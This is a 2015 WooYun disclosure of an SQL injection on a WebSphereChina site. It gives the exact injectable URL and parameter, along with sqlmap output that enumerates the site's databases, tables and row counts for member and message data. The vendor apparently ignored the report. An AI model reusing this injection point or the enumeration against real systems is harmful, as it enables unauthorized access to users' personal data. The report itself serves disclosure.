当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151389

漏洞标题:WebSphereChina某站点存在注入漏洞(爆大量表单数据)

相关厂商:WebSphere中国

漏洞作者: slimdaddy

提交时间:2015-11-03 14:07

修复时间:2015-12-18 14:08

公开时间:2015-12-18 14:08

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:3

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-03: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

WebSphereChina某站点存在注入漏洞(爆大量表单数据)

详细说明:

注入点:http://www.webspherechina.net/plus/itdaren/detail.php?vid=5

漏洞证明:

数据库:

[22:08:17] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.27
back-end DBMS: MySQL 5.0
[22:08:17] [INFO] fetching database names
[22:08:17] [INFO] the SQL query used returns 5 entries
[22:08:17] [INFO] starting 5 threads
[22:08:17] [INFO] resumed: TWTLIVE
[22:08:17] [INFO] resumed: information_schema
[22:08:17] [INFO] resumed: WEBSPHERE101123
[22:08:17] [INFO] resumed: publicdata
[22:08:17] [INFO] resumed: userinfo
available databases [5]:
[*] information_schema
[*] publicdata
[*] TWTLIVE
[*] userinfo
[*] WEBSPHERE101123
Database: WEBSPHERE101123
[481 tables]
+---------------------------------+
| [Table]access |
| [Table]activities |
| [Table]activityapplies |
| [Table]addons |
| [Table]adminactions |
| [Table]admincustom |
.....
Database: WEBSPHERE101123
+---------------------------------+---------+
| Table | Entries |
+---------------------------------+---------+
| uc_twt_creditlog | 3294013 |
| home_twt_blogview | 741679 |
| uc_pms | 297961 |
| home_friend | 227489 |
| home_examformdata | 143838 |
| home_creditlog | 134091 |
| uc_members | 128456 |
| uc_memberfields | 127998 |
| css_members | 100229 |
| home_spaceinfo | 81650 |
| uc_profiles | 67255 |
| home_friendlog | 62646 |
| home_poke | 61102 |
| home_space | 55772 |
| home_spacefield | 55772 |
| home_member | 49851 |
| home_notification | 45214 |
| uc_onlinetime | 41518 |
| uc_tags | 33962 |
| css_monitor | 23456 |
| css_college_displaylog | 19615 |
| uc_newpm | 16503 |
| survey_answer | 15954 |
| css_spacetags | 10448 |
| uc_friends | 9531 |


修复方案:

加固过滤字符

版权声明:转载请注明来源 slimdaddy@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝